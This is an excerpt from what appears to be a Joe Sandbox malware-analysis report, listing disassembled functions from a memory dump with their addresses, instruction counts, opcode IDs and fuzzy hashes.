                                                          • Instruction ID: e1ffc8f35ae14aad1777cb4d733ce86141e09dfb7df5d874631478fd9b35f66f
                                                          • Opcode Fuzzy Hash: f37f7c84b04533a20d07b15b58bd7ea5fba02e102b7c4a6f49beb24c402ee749
                                                          • Instruction Fuzzy Hash: 42514971210A09DFCB62EF69C990EAAB7FDFF54784F400469EAD197660DB34EA40CB50
                                                          Function 010C4180 Relevance: .2, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ee9fb47f53af0c72ba4f550a042a88c0e3c3b1bf1cc608ce91aed4ca7f71263a
                                                          • Instruction ID: 325fec8a9b1cdaa4cba662b535695cee23fe8f6567ea1d69f03b9d2b90020976
                                                          • Opcode Fuzzy Hash: ee9fb47f53af0c72ba4f550a042a88c0e3c3b1bf1cc608ce91aed4ca7f71263a
                                                          • Instruction Fuzzy Hash: E15155B16083029FD754DF29C891AAFBBE5BBC8A14F44892DF5C9C7250EB30D9058F52
                                                          Function 010445B1 Relevance: .2, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                          • Instruction ID: 6e89498bf1c1e8e085905e3366d5d468756242b7c096d715a37d09c0324b4b7e
                                                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                          • Instruction Fuzzy Hash: A75180B1E0421AABDF15DF94C480BEEBBB5BF49354F044069EA81EB240D735DD45CBA0
                                                          Function 010AE9E0 Relevance: .2, Instructions: 154COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                          • Instruction ID: 201379caecba7765a4c288e8cb88f7766d4b4649fa079a5a39f1a99364bc39f1
                                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                          • Instruction Fuzzy Hash: 3A51A531D1021AEFEF21DBD4C898BEFBBB9AF00364F554665DA9267191D7309E40CBA0
                                                          Function 010E8B28 Relevance: .2, Instructions: 152COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: befce36a583b35c490ad0df582446e3c1014902bae9d73dca2e56ac83451b652
                                                          • Instruction ID: 7146eb99c0161ae31ea77805b5b471280ca3d3aba73ac673da36f503bd7b3076
                                                          • Opcode Fuzzy Hash: befce36a583b35c490ad0df582446e3c1014902bae9d73dca2e56ac83451b652
                                                          • Instruction Fuzzy Hash: 0F41E5707016059FDA69DB2FC99CB7FBBDAEF91220F04C65AE9D58B280DB30D811C691
                                                          Function 010ACBF0 Relevance: .1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c8a1041a70c136bb81bdab17186f628700107a6054e6a6b175d665a24012bcf3
                                                          • Instruction ID: e3befdecd205f99014fc38eabcbd01a52997b8699d61c52ce67e15b0374b2fce
                                                          • Opcode Fuzzy Hash: c8a1041a70c136bb81bdab17186f628700107a6054e6a6b175d665a24012bcf3
                                                          • Instruction Fuzzy Hash: 5351CE7190021ADFDB20EFA8CA809AEFBF9FF48314B928569D595A7304D771AD41CBD0
                                                          Function 0105A430 Relevance: .1, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b6d5c6d5610d5ef5becf70307519d532cbe3a2d929097b31edf16241baa9b00
                                                          • Instruction ID: e45f2eb39d79e508d232d1d67dfe419f93fffff765a9ff915d3921fd3f46e5c3
                                                          • Opcode Fuzzy Hash: 3b6d5c6d5610d5ef5becf70307519d532cbe3a2d929097b31edf16241baa9b00
                                                          • Instruction Fuzzy Hash: 92410771704305DBDF69EF6999A0FEB7774AB58708F00007DEDA29B241DBB29840C790
                                                          Function 010EA9D3 Relevance: .1, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                          • Instruction ID: 8b858292850b1c6017589f6440635c7c8315616796f379902e9cc6624df2aedc
                                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                          • Instruction Fuzzy Hash: 7C411C71701706DFCB25CF19C888A6BB7E9FF88210B09466EE99287240EB30ED14C7D0
                                                          Function 010501F8 Relevance: .1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6484b4f24e01e932ad2c3653a2bd147bc2ae9443e59f255b4c2ef5bf1d9fa78c
                                                          • Instruction ID: 3262d762cd4711ef2a5b71ca13b27eeab763a1cc6676cfbc0f5c89d45f53c0d5
                                                          • Opcode Fuzzy Hash: 6484b4f24e01e932ad2c3653a2bd147bc2ae9443e59f255b4c2ef5bf1d9fa78c
                                                          • Instruction Fuzzy Hash: 3841CA36A012199BDB90DF98C440AEFBBB8BF48700F14816AFC85EB344D7359D41CBA4
                                                          Function 0104EBFC Relevance: .1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a65c43c09805162e6c0c6dba6f0663eb82bc27eecf58b773b4237f87bee53d03
                                                          • Instruction ID: 8cf98e0890b373f964bfa23f44b7c8051d78b13e679e0a7491ee400d2223227d
                                                          • Opcode Fuzzy Hash: a65c43c09805162e6c0c6dba6f0663eb82bc27eecf58b773b4237f87bee53d03
                                                          • Instruction Fuzzy Hash: 9A41B2B16043069FD725EF28C880A5BB7EAFF88214F004879E6D7C7651DB35E845CB55
                                                          Function 01062750 Relevance: .1, Instructions: 137COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                          • Instruction ID: 2057290d3ddb8b1f4377cac0429e2e6d0266bdbb14deff1edb98f93706b44a1e
                                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                          • Instruction Fuzzy Hash: CA518B75A00215CFCB55CF98C490AAEF7F2FF84710F2481A9D995AB351D730AE42DB90
                                                          Function 01026154 Relevance: .1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01725b6bb30cf85c2e3206d09461a8dbc8ca1c00c080be8f792d04f7a6920214
                                                          • Instruction ID: 98299455675de293fa268ffb477315839aa2a78cb4ade480d0e3ca5bbc5441f5
                                                          • Opcode Fuzzy Hash: 01725b6bb30cf85c2e3206d09461a8dbc8ca1c00c080be8f792d04f7a6920214
                                                          • Instruction Fuzzy Hash: 43514870904626CBDB299B28CC00BE8BBF5FF11314F1482E5D9E9A72C5DB769985CF80
                                                          Function 01020BCD Relevance: .1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c88c94005f58229809c7a54041e11108c25dbba31679c11ed86c469ce7398558
                                                          • Instruction ID: d07ed51dc92d9547f380d0db6c734f99147f4e83e655b5973af62a9f37c83484
                                                          • Opcode Fuzzy Hash: c88c94005f58229809c7a54041e11108c25dbba31679c11ed86c469ce7398558
                                                          • Instruction Fuzzy Hash: 4A418F71E0132C9FDB61EF68C984BEE77B8AF49740F0100E5E988AB241D7749E80CB95
                                                          Function 010E866E Relevance: .1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                          • Instruction ID: 7cecd1409d55bc11009744d52fc288d7e46ea8c03f9ebafd7dee00d221be3408
                                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                          • Instruction Fuzzy Hash: 71418975B00105AFDB15DF9ACC88AAFBBFABF88610F1480AAE584A7341D670DD01CB50
                                                          Function 01020887 Relevance: .1, Instructions: 128COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b0f664856f925a7b40e8d5293ca2c631af08690cee2474660ae3d17c164a542
                                                          • Instruction ID: f450360306bb1eefe1c2ad6f1b74c86904ddaf53d1dfe2ac8903ef762090353a
                                                          • Opcode Fuzzy Hash: 2b0f664856f925a7b40e8d5293ca2c631af08690cee2474660ae3d17c164a542
                                                          • Instruction Fuzzy Hash: 2141BFB17007169FE325CF28C480A66B7F9FF89314B108AADE5C786A54E771E846CB90
                                                          Function 0104A470 Relevance: .1, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 96eef26998139965b13172fa11934554d46dd6785401c46af2d53c7486f7adad
                                                          • Instruction ID: 224ed69a58fc85cc2ad30c76361cbc80cd6e819d7c02b8554f7c0a5359567cff
                                                          • Opcode Fuzzy Hash: 96eef26998139965b13172fa11934554d46dd6785401c46af2d53c7486f7adad
                                                          • Instruction Fuzzy Hash: BA41CFB1A85215CFDF25DF6CCA847EDBBB0BB58720F0401B5D4A2AB285DB349940CBA1
                                                          Function 01028BF0 Relevance: .1, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95c97cfdfa6c4ffae8f543cb4bccc99913d018b13c1b9129aeb28c3fc6e81202
                                                          • Instruction ID: 8371b120e95bec88ee36b109d21be9bba8f20ff49fb61722eb69bf303d0dbc96
                                                          • Opcode Fuzzy Hash: 95c97cfdfa6c4ffae8f543cb4bccc99913d018b13c1b9129aeb28c3fc6e81202
                                                          • Instruction Fuzzy Hash: A3411375904216CBD728DF4CC980A9EBBF6FB98B14F24C02AD9919BB55C735D842CB90
                                                          Function 01018918 Relevance: .1, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 319c1c2609ccbbb7081901a8bcc37bb984a937787249e6cc26eed6bdda76234f
                                                          • Instruction ID: fc8c176d3711b44826d0d261d741d8bc3873d9ed76286aad6bfe02c7b6ec156f
                                                          • Opcode Fuzzy Hash: 319c1c2609ccbbb7081901a8bcc37bb984a937787249e6cc26eed6bdda76234f
                                                          • Instruction Fuzzy Hash: 0F4158719187069FD312DF688880AABF7E9BF88B54F44092AF9C0D7250E725DE048B97
                                                          Function 0101A020 Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                          • Instruction ID: be59217a8426a7f12785654347b1ef089251462417d2ea3cce31ff92e55991e4
                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                          • Instruction Fuzzy Hash: E9413B31F01251DBDB62DE6884407BEBBA1EB50B64F1580EAF9C58B248D63A9D80CB90
                                                          Function 010209AD Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f03ebb6bffeac85c36a975c1c10b19aa39cba1736b6ab2ef9c3d88e57ee9c91a
                                                          • Instruction ID: 10fc0b12a8ffb8178083becfd5337b0be1e604647cfad39a13b57477e1637f04
                                                          • Opcode Fuzzy Hash: f03ebb6bffeac85c36a975c1c10b19aa39cba1736b6ab2ef9c3d88e57ee9c91a
                                                          • Instruction Fuzzy Hash: B9419D71601711EFD721CF18C840B6ABBF8FF58314F64866AE489CB251E771E942CB90
                                                          Function 01050710 Relevance: .1, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                          • Instruction ID: 5dcf1dd3293b329a5bbaa4862ca6e9c37daee71b0055f98a06964cc9054a1320
                                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                          • Instruction Fuzzy Hash: 5B411771A00609EFDB64CF98C980AAEBBF8FF18700B10496DE996D7654D330EA44CF90
                                                          Function 0102262C Relevance: .1, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3fb78cbcd93878a50fe7dfd045b07dbb8fed0b6633133439f984210fed18904
                                                          • Instruction ID: 1ef2fa2857813b1fcfdae1ac998620c6b1faa689034bcbf62c8b6eb7577b78db
                                                          • Opcode Fuzzy Hash: a3fb78cbcd93878a50fe7dfd045b07dbb8fed0b6633133439f984210fed18904
                                                          • Instruction Fuzzy Hash: 4D41E371905715CFC765EFA8C904BA9B7F5FF48310F1086A9C4969B2A1DB709981CF41
                                                          Function 0105C8F9 Relevance: .1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d24fd8cd15a88c24f5df474cc39f1e8478417cb461a6deaeb16c845dbfe0608a
                                                          • Instruction ID: 8e4f6031a2a08947f9401177f4e24a08a476137c6ab17b30e5d468e5156d51ee
                                                          • Opcode Fuzzy Hash: d24fd8cd15a88c24f5df474cc39f1e8478417cb461a6deaeb16c845dbfe0608a
                                                          • Instruction Fuzzy Hash: BE3179B1A00349DFEB92CF68C540B99BBF4FF09714F2085AED559EB251D7329902CB90
                                                          Function 010A07C3 Relevance: .1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be27452dc874fa5d37b0f90bd3deaf1c15d0846c1b42412cc1c14a5b4ecaabc9
                                                          • Instruction ID: bcc179081a7e9113d5ae6d3209c4380d3d86970e72231190e0ef5b8926439dc7
                                                          • Opcode Fuzzy Hash: be27452dc874fa5d37b0f90bd3deaf1c15d0846c1b42412cc1c14a5b4ecaabc9
                                                          • Instruction Fuzzy Hash: 47419D719083059BD360DF68C844B9BBBE8FF88764F004A2EF9E8C7295D7709944CB92
                                                          Function 010180A0 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f86367e729bcae21f6b4ec4c597d518ad3b8bed6084328c508f1edf0152cb12e
                                                          • Instruction ID: 1bbe84a9f1166752b8ffbc5dc9f171177a4a18b2df81a280492d156b597ea4d1
                                                          • Opcode Fuzzy Hash: f86367e729bcae21f6b4ec4c597d518ad3b8bed6084328c508f1edf0152cb12e
                                                          • Instruction Fuzzy Hash: 1941F472E055169FCB01DF58C880AACB7F9FF54760F24C26AD895A7284D738EE418BD0
                                                          Function 010A05A7 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6ea3369e1173322db9c066e018ea480bf3430af05804708594f05c33acc8fa3
                                                          • Instruction ID: ff4162cfcfc27c45c51463cca0b4fcf5abb693cded5275666e527ac3473ed0a9
                                                          • Opcode Fuzzy Hash: e6ea3369e1173322db9c066e018ea480bf3430af05804708594f05c33acc8fa3
                                                          • Instruction Fuzzy Hash: CC41E47260864A9FD320DF68C840AAAB7E9FFC8700F144A19F9D4D7684E730E914C7A6
                                                          Function 01024859 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 71272d39d85d8b85e6a939a4e524a93dc4d320dac4007f03e828dfcacc908477
                                                          • Instruction ID: b5a13f43e9448b9f1a9ca67663bc3c1d0b0dc63fff7f0f26b29a4caf8164ccae
                                                          • Opcode Fuzzy Hash: 71272d39d85d8b85e6a939a4e524a93dc4d320dac4007f03e828dfcacc908477
                                                          • Instruction Fuzzy Hash: 8241D1303143268BD725DF28D894B6ABBE9EF80364F14446DEAD5CB291DB70D941CB91
                                                          Function 01018B50 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 10fc49b4add85421289d88d7559fb311000ec8b64506f9136e09944ef0e7e3b9
                                                          • Instruction ID: cc2b5a03ec7f8ed5595492e8c0e5c3f201f1c59a03426ce8c2328dc7b1069030
                                                          • Opcode Fuzzy Hash: 10fc49b4add85421289d88d7559fb311000ec8b64506f9136e09944ef0e7e3b9
                                                          • Instruction Fuzzy Hash: 45419F71E01609CFCB14DF69C98099DBBF1FF88324B20C66BD4A6A7254DB38AA41CB40
                                                          Function 010302E1 Relevance: .1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                          • Instruction ID: 253b6206ced11523238e0386a92585fed7b474d43c1369891ded42afc272db34
                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                          • Instruction Fuzzy Hash: 39312531A05249AFDB529B68CC80BDFBFECAF54750F0481A5F8D5D7356C2B49884CBA0
                                                          Function 010CE3DB Relevance: .1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74b10ac8bcb1c4748c42deec1f72eae7d8f1e204ad360d82b0034d3cec12f51d
                                                          • Instruction ID: 56044a48b079de66fd313d438ea725ce8ab6a568dbeaa283a175b1b867f82eee
                                                          • Opcode Fuzzy Hash: 74b10ac8bcb1c4748c42deec1f72eae7d8f1e204ad360d82b0034d3cec12f51d
                                                          • Instruction Fuzzy Hash: 02318A75750716ABD7229F55CC81FAFBAB9AB59F50F100039F640AB291DB65DC00CBA0
                                                          Function 010D4B4B Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a10a9ed2cf1c0151514850a4169588cb2c39be8e7cde75032df46424a93638b5
                                                          • Instruction ID: 040ca8cd63601348657554f6339cb141ff1ff3e8e899f37e004b5b94898d9f60
                                                          • Opcode Fuzzy Hash: a10a9ed2cf1c0151514850a4169588cb2c39be8e7cde75032df46424a93638b5
                                                          • Instruction Fuzzy Hash: C131CF326053018FC725DF19D980E6AB7E9FB81360F0A44BEE9E5CBA55DB71A840CF91
                                                          Function 01024260 Relevance: .1, Instructions: 102COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0adcd6b7873f095be62f678318e417400c2cc59d6d2a67bd6959a4330d9ee39c
                                                          • Instruction ID: 13ac3e7fb6c5da03609ecd03fb7055cf864daa7dd170a50ecce30cb5d71b90e7
